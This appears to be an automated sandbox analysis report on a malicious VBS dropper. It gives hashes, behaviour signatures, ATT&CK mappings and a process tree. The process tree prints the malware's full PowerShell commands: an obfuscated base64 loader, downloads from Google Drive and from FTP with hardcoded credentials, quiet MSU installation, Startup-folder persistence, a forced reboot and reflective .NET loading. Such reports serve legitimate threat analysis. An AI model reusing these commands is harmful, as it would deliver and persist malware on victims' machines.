c50d459ee28fb9d7dfaa8067855e984f19828028f56aefe8187dcd622d9c2d09

General

Target

c50d459ee28fb9d7dfaa8067855e984f19828028f56aefe8187dcd622d9c2d09.vbs
Size

689KB
MD5

87f27580d805863d210331653ca944a7
SHA1

d861804f8fa941e95f8f779a295ffb0812ba2d4e
SHA256

c50d459ee28fb9d7dfaa8067855e984f19828028f56aefe8187dcd622d9c2d09
SHA512

eb895266a5774eefbc9ac6b30612a42a0d331fac221875fd9c59a67110880716ba7c7c890eb969f531dcfcff4a2c71cfdcab1c35116ec4d56de8cbf7e1a25d64
SSDEEP

1536:VPPPPPPPPPPPPPPPPPPPPPPPE777777777777777777777777777777777777772:uK

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Signatures

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c50d459ee28fb9d7dfaa8067855e984f19828028f56aefe8187dcd622d9c2d09.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c50d459ee28fb9d7dfaa8067855e984f19828028f56aefe8187dcd622d9c2d09.vbs	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2468	powershell.exe
2216	powershell.exe
2648	powershell.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	wusa.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2468	powershell.exe
2216	powershell.exe
2640	powershell.exe
2648	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2468	powershell.exe
Token: SeDebugPrivilege	2216	powershell.exe
Token: SeDebugPrivilege	2640	powershell.exe
Token: SeDebugPrivilege	2648	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2276 wrote to memory of 2468	2276	WScript.exe	30
PID 2276 wrote to memory of 2468	2276	WScript.exe	30
PID 2276 wrote to memory of 2468	2276	WScript.exe	30
PID 2468 wrote to memory of 2216	2468	powershell.exe	32
PID 2468 wrote to memory of 2216	2468	powershell.exe	32
PID 2468 wrote to memory of 2216	2468	powershell.exe	32
PID 2216 wrote to memory of 2640	2216	powershell.exe	33
PID 2216 wrote to memory of 2640	2216	powershell.exe	33
PID 2216 wrote to memory of 2640	2216	powershell.exe	33
PID 2640 wrote to memory of 2684	2640	powershell.exe	34
PID 2640 wrote to memory of 2684	2640	powershell.exe	34
PID 2640 wrote to memory of 2684	2640	powershell.exe	34
PID 2216 wrote to memory of 2648	2216	powershell.exe	35
PID 2216 wrote to memory of 2648	2216	powershell.exe	35
PID 2216 wrote to memory of 2648	2216	powershell.exe	35

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c50d459ee28fb9d7dfaa8067855e984f19828028f56aefe8187dcd622d9c2d09.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2276
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qCybe = 'OwB9せㅚしDsせㅚしKQせㅚしgせㅚしCkせㅚしIせㅚしせㅚしnせㅚしDEせㅚしZQB1せㅚしHIせㅚしdせㅚしせㅚしnせㅚしCせㅚしせㅚしLせㅚしせㅚしgせㅚしGUせㅚしagB3せㅚしHoせㅚしaせㅚしせㅚしkせㅚしCせㅚしせㅚしLせㅚしせㅚしgせㅚしCcせㅚしaせㅚしB0せㅚしHQせㅚしcせㅚしBzせㅚしDoせㅚしLwせㅚしvせㅚしHcせㅚしdwB3せㅚしC4せㅚしbQBlせㅚしGQせㅚしaQBhせㅚしGYせㅚしaQByせㅚしGUせㅚしLgBjせㅚしG8せㅚしbQせㅚしvせㅚしGYせㅚしaQBsせㅚしGUせㅚしXwBwせㅚしHIせㅚしZQBtせㅚしGkせㅚしdQBtせㅚしC8せㅚしZwせㅚし2せㅚしG0せㅚしZQBnせㅚしGoせㅚしNwせㅚし3せㅚしGMせㅚしbQBlせㅚしHgせㅚしeせㅚしBnせㅚしDgせㅚしLwBhせㅚしGcせㅚしdQせㅚしuせㅚしHQせㅚしeせㅚしB0せㅚしC8せㅚしZgBpせㅚしGwせㅚしZQせㅚしnせㅚしCせㅚしせㅚしKせㅚしせㅚしgせㅚしF0せㅚしXQBbせㅚしHQせㅚしYwBlせㅚしGoせㅚしYgBvせㅚしFsせㅚしIせㅚしせㅚしsせㅚしCせㅚしせㅚしbせㅚしBsせㅚしHUせㅚしbgせㅚしkせㅚしCせㅚしせㅚしKせㅚしBlせㅚしGsせㅚしbwB2せㅚしG4せㅚしSQせㅚしuせㅚしCkせㅚしIせㅚしせㅚしnせㅚしEkせㅚしVgBGせㅚしHIせㅚしcせㅚしせㅚしnせㅚしCせㅚしせㅚしKせㅚしBkせㅚしG8せㅚしaせㅚしB0せㅚしGUせㅚしTQB0せㅚしGUせㅚしRwせㅚしuせㅚしCkせㅚしJwせㅚしxせㅚしHMせㅚしcwBhせㅚしGwせㅚしQwせㅚしuせㅚしDMせㅚしeQByせㅚしGEせㅚしcgBiせㅚしGkせㅚしTせㅚしBzせㅚしHMせㅚしYQBsせㅚしEMせㅚしJwせㅚしoせㅚしGUせㅚしcせㅚしB5せㅚしFQせㅚしdせㅚしBlせㅚしEcせㅚしLgせㅚしpせㅚしCせㅚしせㅚしeせㅚしBtせㅚしHoせㅚしWせㅚしB4せㅚしCQせㅚしIせㅚしせㅚしoせㅚしGQせㅚしYQBvせㅚしEwせㅚしLgBuせㅚしGkせㅚしYQBtせㅚしG8せㅚしRせㅚしB0せㅚしG4せㅚしZQByせㅚしHIせㅚしdQBDせㅚしDoせㅚしOgBdせㅚしG4せㅚしaQBhせㅚしG0せㅚしbwBEせㅚしHせㅚしせㅚしcせㅚしBBせㅚしC4せㅚしbQBlせㅚしHQせㅚしcwB5せㅚしFMせㅚしWwせㅚし7せㅚしCkせㅚしIせㅚしせㅚしpせㅚしCせㅚしせㅚしJwBBせㅚしCcせㅚしIせㅚしせㅚしsせㅚしCせㅚしせㅚしJwCTIToせㅚしkyEnせㅚしCせㅚしせㅚしKせㅚしBlせㅚしGMせㅚしYQBsせㅚしHせㅚしせㅚしZQBSせㅚしC4せㅚしbgBaせㅚしHcせㅚしQQBHせㅚしCQせㅚしIせㅚしせㅚしoせㅚしGcせㅚしbgBpせㅚしHIせㅚしdせㅚしBTせㅚしDQせㅚしNgBlせㅚしHMせㅚしYQBCせㅚしG0せㅚしbwByせㅚしEYせㅚしOgせㅚし6せㅚしF0せㅚしdせㅚしByせㅚしGUせㅚしdgBuせㅚしG8せㅚしQwせㅚしuせㅚしG0せㅚしZQB0せㅚしHMせㅚしeQBTせㅚしFsせㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしeせㅚしBtせㅚしHoせㅚしWせㅚしB4せㅚしCQせㅚしIせㅚしBdせㅚしF0せㅚしWwBlせㅚしHQせㅚしeQBCせㅚしFsせㅚしOwせㅚしnせㅚしCUせㅚしSQBoせㅚしHEせㅚしUgBYせㅚしCUせㅚしJwせㅚしgせㅚしD0せㅚしIせㅚしBlせㅚしGoせㅚしdwB6せㅚしGgせㅚしJせㅚしせㅚし7せㅚしCkせㅚしIせㅚしBuせㅚしFoせㅚしdwBBせㅚしEcせㅚしJせㅚしせㅚしgせㅚしCgせㅚしZwBuせㅚしGkせㅚしcgB0せㅚしFMせㅚしZせㅚしBhせㅚしG8せㅚしbせㅚしBuせㅚしHcせㅚしbwBEせㅚしC4せㅚしUQBYせㅚしGEせㅚしUwBDせㅚしCQせㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしbgBaせㅚしHcせㅚしQQBHせㅚしCQせㅚしOwせㅚし4せㅚしEYせㅚしVせㅚしBVせㅚしDoせㅚしOgBdせㅚしGcせㅚしbgBpせㅚしGQせㅚしbwBjせㅚしG4せㅚしRQせㅚしuせㅚしHQせㅚしeせㅚしBlせㅚしFQせㅚしLgBtせㅚしGUせㅚしdせㅚしBzせㅚしHkせㅚしUwBbせㅚしCせㅚしせㅚしPQせㅚしgせㅚしGcせㅚしbgBpせㅚしGQせㅚしbwBjせㅚしG4せㅚしRQせㅚしuせㅚしFEせㅚしWせㅚしBhせㅚしFMせㅚしQwせㅚしkせㅚしDsせㅚしKQB0せㅚしG4せㅚしZQBpせㅚしGwせㅚしQwBiせㅚしGUせㅚしVwせㅚしuせㅚしHQせㅚしZQBOせㅚしCせㅚしせㅚしdせㅚしBjせㅚしGUせㅚしagBiせㅚしE8せㅚしLQB3せㅚしGUせㅚしTgせㅚしoせㅚしCせㅚしせㅚしPQせㅚしgせㅚしFEせㅚしWせㅚしBhせㅚしFMせㅚしQwせㅚしkせㅚしDsせㅚしKQせㅚしoせㅚしGUせㅚしcwBvせㅚしHせㅚしせㅚしcwBpせㅚしGQせㅚしLgBRせㅚしFgせㅚしYQBTせㅚしEMせㅚしJせㅚしせㅚし7せㅚしCkせㅚしIせㅚしせㅚしnせㅚしHQせㅚしeせㅚしB0せㅚしC4せㅚしMQせㅚしwせㅚしEwせㅚしTせㅚしBEせㅚしC8せㅚしMQせㅚしwせㅚしC8せㅚしcgBlせㅚしHQせㅚしcせㅚしB5せㅚしHIせㅚしYwBwせㅚしFUせㅚしLwByせㅚしGIせㅚしLgBtせㅚしG8せㅚしYwせㅚしuせㅚしHQせㅚしYQByせㅚしGIせㅚしdgBrせㅚしGMせㅚしcwBlせㅚしGQせㅚしLgBwせㅚしHQせㅚしZgBせㅚしせㅚしDEせㅚしdせㅚしBhせㅚしHIせㅚしYgB2せㅚしGsせㅚしYwBzせㅚしGUせㅚしZせㅚしせㅚしvせㅚしC8せㅚしOgBwせㅚしHQせㅚしZgせㅚしnせㅚしCせㅚしせㅚしKせㅚしBnせㅚしG4せㅚしaQByせㅚしHQせㅚしUwBkせㅚしGEせㅚしbwBsせㅚしG4せㅚしdwBvせㅚしEQせㅚしLgBRせㅚしFgせㅚしYQBTせㅚしEMせㅚしJせㅚしせㅚしgせㅚしD0せㅚしIせㅚしBuせㅚしFoせㅚしdwBBせㅚしEcせㅚしJせㅚしせㅚし7せㅚしCkせㅚしJwBせㅚしせㅚしEせㅚしせㅚしcせㅚしBKせㅚしDgせㅚしNwせㅚし1せㅚしDEせㅚしMgBvせㅚしHIせㅚしcせㅚしByせㅚしGUせㅚしcせㅚしBvせㅚしGwせㅚしZQB2せㅚしGUせㅚしZせㅚしせㅚしnせㅚしCwせㅚしJwせㅚしxせㅚしHQせㅚしYQByせㅚしGIせㅚしdgBrせㅚしGMせㅚしcwBlせㅚしGQせㅚしJwせㅚしoせㅚしGwせㅚしYQBpせㅚしHQせㅚしbgBlせㅚしGQせㅚしZQByせㅚしEMせㅚしawByせㅚしG8せㅚしdwB0せㅚしGUせㅚしTgせㅚしuせㅚしHQせㅚしZQBOせㅚしC4せㅚしbQBlせㅚしHQせㅚしcwB5せㅚしFMせㅚしIせㅚしB0せㅚしGMせㅚしZQBqせㅚしGIせㅚしbwせㅚしtせㅚしHcせㅚしZQBuせㅚしCせㅚしせㅚしPQせㅚしgせㅚしHMせㅚしbせㅚしBhせㅚしGkせㅚしdせㅚしBuせㅚしGUせㅚしZせㅚしBlせㅚしHIせㅚしQwせㅚしuせㅚしFEせㅚしWせㅚしBhせㅚしFMせㅚしQwせㅚしkせㅚしDsせㅚしOせㅚしBGせㅚしFQせㅚしVQせㅚし6せㅚしDoせㅚしXQBnせㅚしG4せㅚしaQBkせㅚしG8せㅚしYwBuせㅚしEUせㅚしLgB0せㅚしHgせㅚしZQBUせㅚしC4せㅚしbQBlせㅚしHQせㅚしcwB5せㅚしFMせㅚしWwせㅚしgせㅚしD0せㅚしIせㅚしBnせㅚしG4せㅚしaQBkせㅚしG8せㅚしYwBuせㅚしEUせㅚしLgBRせㅚしFgせㅚしYQBTせㅚしEMせㅚしJせㅚしせㅚし7せㅚしCkせㅚしdせㅚしBuせㅚしGUせㅚしaQBsせㅚしEMせㅚしYgBlせㅚしFcせㅚしLgB0せㅚしGUせㅚしTgせㅚしgせㅚしHQせㅚしYwBlせㅚしGoせㅚしYgBPせㅚしC0せㅚしdwBlせㅚしE4せㅚしKせㅚしせㅚしgせㅚしD0せㅚしIせㅚしBRせㅚしFgせㅚしYQBTせㅚしEMせㅚしJせㅚしせㅚし7せㅚしG4せㅚしWgB3せㅚしEEせㅚしRwせㅚしkせㅚしDsせㅚしMgせㅚしxせㅚしHMせㅚしbせㅚしBUせㅚしDoせㅚしOgBdせㅚしGUせㅚしcせㅚしB5せㅚしFQせㅚしbせㅚしBvせㅚしGMせㅚしbwB0せㅚしG8せㅚしcgBQせㅚしHkせㅚしdせㅚしBpせㅚしHIせㅚしdQBjせㅚしGUせㅚしUwせㅚしuせㅚしHQせㅚしZQBOせㅚしC4せㅚしbQBlせㅚしHQせㅚしcwB5せㅚしFMせㅚしWwせㅚしgせㅚしD0せㅚしIせㅚしBsせㅚしG8せㅚしYwBvせㅚしHQせㅚしbwByせㅚしFせㅚしせㅚしeQB0せㅚしGkせㅚしcgB1せㅚしGMせㅚしZQBTせㅚしDoせㅚしOgBdせㅚしHIせㅚしZQBnせㅚしGEせㅚしbgBhせㅚしE0せㅚしdせㅚしBuせㅚしGkせㅚしbwBQせㅚしGUせㅚしYwBpせㅚしHYせㅚしcgBlせㅚしFMせㅚしLgB0せㅚしGUせㅚしTgせㅚしuせㅚしG0せㅚしZQB0せㅚしHMせㅚしeQBTせㅚしFsせㅚしOwB9せㅚしGUせㅚしdQByせㅚしHQせㅚしJせㅚしB7せㅚしCせㅚしせㅚしPQせㅚしgせㅚしGsせㅚしYwBhせㅚしGIせㅚしbせㅚしBsせㅚしGEせㅚしQwBuせㅚしG8せㅚしaQB0せㅚしGEせㅚしZせㅚしBpせㅚしGwせㅚしYQBWせㅚしGUせㅚしdせㅚしBhせㅚしGMせㅚしaQBmせㅚしGkせㅚしdせㅚしByせㅚしGUせㅚしQwByせㅚしGUせㅚしdgByせㅚしGUせㅚしUwせㅚし6せㅚしDoせㅚしXQByせㅚしGUせㅚしZwBhせㅚしG4せㅚしYQBNせㅚしHQせㅚしbgBpせㅚしG8せㅚしUせㅚしBlせㅚしGMせㅚしaQB2せㅚしHIせㅚしZQBTせㅚしC4せㅚしdせㅚしBlせㅚしE4せㅚしLgBtせㅚしGUせㅚしdせㅚしBzせㅚしHkせㅚしUwBbせㅚしHsせㅚしIせㅚしBlせㅚしHMせㅚしbせㅚしBlせㅚしH0せㅚしIせㅚしBmせㅚしC8せㅚしIせㅚしせㅚしwせㅚしCせㅚしせㅚしdせㅚしせㅚしvせㅚしCせㅚしせㅚしcgせㅚしvせㅚしCせㅚしせㅚしZQB4せㅚしGUせㅚしLgBuせㅚしHcせㅚしbwBkせㅚしHQせㅚしdQBoせㅚしHMせㅚしIせㅚしせㅚし7せㅚしCcせㅚしMせㅚしせㅚし4せㅚしDEせㅚしIせㅚしBwせㅚしGUせㅚしZQBsせㅚしHMせㅚしJwせㅚしgせㅚしGQせㅚしbgBhせㅚしG0せㅚしbQBvせㅚしGMせㅚしLQせㅚしgせㅚしGUせㅚしeせㅚしBlせㅚしC4せㅚしbせㅚしBsせㅚしGUせㅚしaせㅚしBzせㅚしHIせㅚしZQB3せㅚしG8せㅚしcせㅚしせㅚし7せㅚしCせㅚしせㅚしZQBjせㅚしHIせㅚしbwBmせㅚしC0せㅚしIせㅚしせㅚしpせㅚしCせㅚしせㅚしJwBwせㅚしHUせㅚしdせㅚしByせㅚしGEせㅚしdせㅚしBTせㅚしFwせㅚしcwBtせㅚしGEせㅚしcgBnせㅚしG8せㅚしcgBQせㅚしFwせㅚしdQBuせㅚしGUせㅚしTQせㅚしgせㅚしHQせㅚしcgBhせㅚしHQせㅚしUwBcせㅚしHMせㅚしdwBvせㅚしGQせㅚしbgBpせㅚしFcせㅚしXせㅚしB0せㅚしGYせㅚしbwBzせㅚしG8せㅚしcgBjせㅚしGkせㅚしTQBcせㅚしGcせㅚしbgBpせㅚしG0せㅚしYQBvせㅚしFIせㅚしXせㅚしBhせㅚしHQせㅚしYQBEせㅚしHせㅚしせㅚしcせㅚしBBせㅚしFwせㅚしJwせㅚしgせㅚしCsせㅚしIせㅚしBwせㅚしHUせㅚしdせㅚしByせㅚしGEせㅚしdせㅚしBTせㅚしGQせㅚしbせㅚしBvせㅚしEYせㅚしJせㅚしせㅚしgせㅚしCgせㅚしIせㅚしBuせㅚしG8せㅚしaQB0せㅚしGEせㅚしbgBpせㅚしHQせㅚしcwBlせㅚしEQせㅚしLQせㅚしgせㅚしCcせㅚしJQBJせㅚしGgせㅚしcQBSせㅚしFgせㅚしJQせㅚしnせㅚしCせㅚしせㅚしbQBlせㅚしHQせㅚしSQせㅚしtせㅚしHkせㅚしcせㅚしBvせㅚしEMせㅚしIせㅚしせㅚし7せㅚしCせㅚしせㅚしdせㅚしByせㅚしGEせㅚしdせㅚしBzせㅚしGUせㅚしcgBvせㅚしG4せㅚしLwせㅚしgせㅚしHQせㅚしZQBpせㅚしHUせㅚしcQせㅚしvせㅚしCせㅚしせㅚしZQBsせㅚしGkせㅚしZgせㅚしkせㅚしCせㅚしせㅚしZQB4せㅚしGUせㅚしLgBhせㅚしHMせㅚしdQB3せㅚしCせㅚしせㅚしZQB4せㅚしGUせㅚしLgBsせㅚしGwせㅚしZQBoせㅚしHMせㅚしcgBlせㅚしHcせㅚしbwBwせㅚしCせㅚしせㅚしOwせㅚしpせㅚしCcせㅚしdQBzせㅚしG0せㅚしLgBuせㅚしGkせㅚしdwBwせㅚしFUせㅚしXせㅚしせㅚしnせㅚしCせㅚしせㅚしKwせㅚしgせㅚしGEせㅚしdせㅚしBzせㅚしGEせㅚしcせㅚしせㅚしkせㅚしCgせㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしZQBsせㅚしGkせㅚしZgせㅚしkせㅚしDsせㅚしKQせㅚしgせㅚしGUせㅚしbQBhせㅚしE4せㅚしcgBlせㅚしHMせㅚしVQせㅚし6せㅚしDoせㅚしXQB0せㅚしG4せㅚしZQBtせㅚしG4せㅚしbwByせㅚしGkせㅚしdgBuせㅚしEUせㅚしWwせㅚしgせㅚしCsせㅚしIせㅚしせㅚしnせㅚしFwせㅚしcwByせㅚしGUせㅚしcwBVせㅚしFwせㅚしOgBDせㅚしCcせㅚしKせㅚしせㅚしgせㅚしD0せㅚしIせㅚしBwせㅚしHUせㅚしdせㅚしByせㅚしGEせㅚしdせㅚしBTせㅚしGQせㅚしbせㅚしBvせㅚしEYせㅚしJせㅚしせㅚし7せㅚしCkせㅚしJwB1せㅚしHMせㅚしbQせㅚしuせㅚしG4せㅚしaQB3せㅚしHせㅚしせㅚしVQBcせㅚしCcせㅚしIせㅚしせㅚしrせㅚしCせㅚしせㅚしYQB0せㅚしHMせㅚしYQBwせㅚしCQせㅚしIせㅚしせㅚしsせㅚしEIせㅚしSwBMせㅚしFIせㅚしVQせㅚしkせㅚしCgせㅚしZQBsせㅚしGkせㅚしRgBkせㅚしGEせㅚしbwBsせㅚしG4せㅚしdwBvせㅚしEQせㅚしLgBwせㅚしFkせㅚしUwB3せㅚしGYせㅚしJせㅚしせㅚし7せㅚしDgせㅚしRgBUせㅚしFUせㅚしOgせㅚし6せㅚしF0せㅚしZwBuせㅚしGkせㅚしZせㅚしBvせㅚしGMせㅚしbgBFせㅚしC4せㅚしdせㅚしB4せㅚしGUせㅚしVせㅚしせㅚしuせㅚしG0せㅚしZQB0せㅚしHMせㅚしeQBTせㅚしFsせㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしZwBuせㅚしGkせㅚしZせㅚしBvせㅚしGMせㅚしbgBFせㅚしC4せㅚしcせㅚしBZせㅚしFMせㅚしdwBmせㅚしCQせㅚしOwせㅚしpせㅚしHQせㅚしbgBlせㅚしGkせㅚしbせㅚしBDせㅚしGIせㅚしZQBXせㅚしC4せㅚしdせㅚしBlせㅚしE4せㅚしIせㅚしB0せㅚしGMせㅚしZQBqせㅚしGIせㅚしTwせㅚしtせㅚしHcせㅚしZQBOせㅚしCgせㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしcせㅚしBZせㅚしFMせㅚしdwBmせㅚしCQせㅚしOwB9せㅚしDsせㅚしIせㅚしせㅚしpせㅚしCcせㅚしcgBnせㅚしDgせㅚしRせㅚしせㅚし3せㅚしG8せㅚしUgBzせㅚしGYせㅚしVgBjせㅚしHIせㅚしMgBuせㅚしEEせㅚしaせㅚしBmせㅚしGgせㅚしVgせㅚし2せㅚしEQせㅚしQwB4せㅚしFIせㅚしcQBuせㅚしHEせㅚしagせㅚし1せㅚしGoせㅚしcgBiせㅚしDEせㅚしJwせㅚしgせㅚしCsせㅚしIせㅚしBwせㅚしEgせㅚしQQBTせㅚしGgせㅚしJせㅚしせㅚしoせㅚしCせㅚしせㅚしPQせㅚしgせㅚしHせㅚしせㅚしSせㅚしBBせㅚしFMせㅚしaせㅚしせㅚしkせㅚしHsせㅚしIせㅚしBlせㅚしHMせㅚしbせㅚしBlせㅚしH0せㅚしOwせㅚしgせㅚしCkせㅚしJwB4せㅚしDQせㅚしZgBoせㅚしFoせㅚしTQB3せㅚしE4せㅚしNwBVせㅚしGUせㅚしXwせㅚしwせㅚしF8せㅚしNQBfせㅚしGkせㅚしYwBzせㅚしGIせㅚしaせㅚしせㅚし3せㅚしEMせㅚしUせㅚしせㅚしwせㅚしEkせㅚしZgBQせㅚしGQせㅚしQQせㅚしyせㅚしDEせㅚしMQせㅚしnせㅚしCせㅚしせㅚしKwせㅚしgせㅚしHせㅚしせㅚしSせㅚしBBAFMAaAAkACgAIAA9ACAAcABIAEEAUwBoACQAewAgACkAdgBmAFkAVABIACQAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcwBuAGkAYQB0AG4AbwBDAC4ARQBSAFUAVABDAEUAVABJAEgAQwBSAEEAXwBSAE8AUwBTAEUAQwBPAFIAUAA6AHYAbgBlACQAIAA9ACAAdgBmAFkAVABIACQAOwAnAD0AZABpACYAZABhAG8AbABuAHcAbwBkAD0AdAByAG8AcAB4AGUAPwBjAHUALwBtAG8AYwAuAGUAbABnAG8AbwBnAC4AZQB2AGkAcgBkAC8ALwA6AHMAcAB0AHQAaAAnACAAPQAgAHAASABBAFMAaAAkADsAKQAnAHUAcwBtAC4AbgBpAHcAcABVAFwAJwAgACsAIABhAHQAcwBhAHAAJAAoACAAbABlAGQAOwApACgAaAB0AGEAUABwAG0AZQBUAHQAZQBHADoAOgBdAGgAdABhAFAALgBPAEkALgBtAGUAdABzAHkAUwBbACAAPQAgAGEAdABzAGEAcAAkAHsAIAApAGIASgBHAHAAUgAkACgAIABmAGkAOwAgACkAMgAoAHMAbABhAHUAcQBFAC4AcgBvAGoAYQBNAC4AbgBvAGkAcwByAGUAVgAuAHQAcwBvAGgAJAAgAD0AIABiAEoARwBwAFIAJAAgADsA';$ziISm = $qCybe.replace('せㅚし' , 'A') ;$bQOzu = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $ziISm ) ); $bQOzu = $bQOzu[-1..-$bQOzu.Length] -join '';$bQOzu = $bQOzu.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\c50d459ee28fb9d7dfaa8067855e984f19828028f56aefe8187dcd622d9c2d09.vbs');powershell $bQOzu
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2468
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $RpGJb = $host.Version.Major.Equals(2) ;if ($RpGJb) {$pasta = [System.IO.Path]::GetTempPath();del ($pasta + '\Upwin.msu');$hSAHp = 'https://drive.google.com/uc?export=download&id=';$HTYfv = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ($HTYfv) {$hSAHp = ($hSAHp + '112AdPfI0PC7hbsci_5_0_eU7NwMZhf4x') ;}else {$hSAHp = ($hSAHp + '1brj5jqnqRxCD6VhfhAn2rcVfsRo7D8gr') ;};$fwSYp = (New-Object Net.WebClient);$fwSYp.Encoding = [System.Text.Encoding]::UTF8;$fwSYp.DownloadFile($URLKB, $pasta + '\Upwin.msu');$FoldStartup = ('C:\Users\' + [Environment]::UserName );$file = ($pasta + '\Upwin.msu'); powershell.exe wusa.exe $file /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\c50d459ee28fb9d7dfaa8067855e984f19828028f56aefe8187dcd622d9c2d09.vbs' -Destination ( $FoldStartup + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$GAwZn;$CSaXQ = (New-Object Net.WebClient);$CSaXQ.Encoding = [System.Text.Encoding]::UTF8;$CSaXQ.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$GAwZn = $CSaXQ.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$CSaXQ.dispose();$CSaXQ = (New-Object Net.WebClient);$CSaXQ.Encoding = [System.Text.Encoding]::UTF8;$GAwZn = $CSaXQ.DownloadString( $GAwZn );$hzwje = 'C:\Users\Admin\AppData\Local\Temp\c50d459ee28fb9d7dfaa8067855e984f19828028f56aefe8187dcd622d9c2d09.vbs';[Byte[]] $xXzmx = [System.Convert]::FromBase64String( $GAwZn.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $xXzmx ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'elif/txt.uga/8gxxemc77jgem6g/muimerp_elif/moc.erifaidem.www//:sptth' , $hzwje , 'true1' ) );};"
    3⤵
    - Drops startup file
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2216
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe C:\Users\Admin\AppData\Local\Temp\\Upwin.msu /quiet /norestart
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2640
    - - C:\Windows\system32\wusa.exe
        
        "C:\Windows\system32\wusa.exe" C:\Users\Admin\AppData\Local\Temp\\Upwin.msu /quiet /norestart
        5⤵
        Drops file in Windows directory
        
        PID:2684
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2648

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
03e11ad8872715118aaaf2db87ccf44b

SHA1
b03c5ed1c7b91567d5df95061ed773c8f5dbe1c2

SHA256
7d09c98eaafbea8fcf323609606cc874e30b28130f9371e65b4fc5be9701ff8b

SHA512
c9e5ae675aa5958be964b1f3f62279a619d212bbde8af3180032f134581c4351b51d54fbedf524666143b7c300e0a27d4e2f8c037f9e65dc9735308f5c19c67a

Download Submit
memory/2468-4-0x000007FEF4FDE000-0x000007FEF4FDF000-memory.dmp

Filesize
4KB

Download
memory/2468-6-0x0000000001D20000-0x0000000001D28000-memory.dmp

Filesize
32KB

Download
memory/2468-5-0x000000001B630000-0x000000001B912000-memory.dmp

Filesize
2.9MB

Download
memory/2468-7-0x000007FEF4D20000-0x000007FEF56BD000-memory.dmp

Filesize
9.6MB

Download
memory/2468-13-0x000007FEF4D20000-0x000007FEF56BD000-memory.dmp

Filesize
9.6MB

Download
memory/2468-26-0x000007FEF4D20000-0x000007FEF56BD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing